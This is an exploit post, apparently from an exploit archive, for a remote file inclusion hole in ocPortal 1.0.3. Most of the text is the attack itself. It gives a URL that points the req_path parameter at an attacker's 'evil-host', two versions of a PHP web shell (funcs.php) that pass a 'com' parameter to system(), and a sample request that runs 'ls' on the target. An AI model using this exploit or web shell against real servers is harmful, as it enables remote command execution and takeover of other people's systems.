id: 38
date: 10/12/2004
title: ocPortal 1.0.3 Remote File Inclusion
author: Exoduks
cves: 

====================================
ocPortal 1.0.3 Remote File Inclusion
====================================




http://localhost/ocp-103/index.php?req_path=http ://evil-host/



On your evil host you must put scipt funcs.php.

Example of funcs.php if your host doesn't support php.



   <?php

     $com = $_GET["com"];

     system ("$com");

   ?>



  Example of funcs.php if your host support php.



   <?php

     echo '<?php $com = $_GET["com"]; system ("$com"); ?>';

   ?>



  http://localhost/ocp-103/index.php?req_path=http://evil-host/&com=ls




#  0day.today [2023-03-25]  #